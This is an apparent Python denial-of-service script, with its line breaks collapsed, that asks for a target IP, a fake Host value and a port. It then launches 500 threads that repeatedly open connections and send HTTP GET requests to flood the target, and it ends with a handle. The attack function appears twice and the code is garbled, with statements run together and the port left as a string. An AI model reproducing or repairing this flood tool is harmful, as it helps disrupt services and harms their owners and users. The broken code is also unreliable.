import socketimport threading

target = input('Enter target IP:')fake_ip = input('Enter fake IP:')port = input('Enter port:')

def attack():while True:s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((target,port))s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))s.close()for i in range(500):thread = threading.Thread(target=attack)thread.start()

attack_num = 0def attack():while True:s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((target, port))s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))

global attack_numattack_num += 1print(attack_num)

s.close()
@to1kis
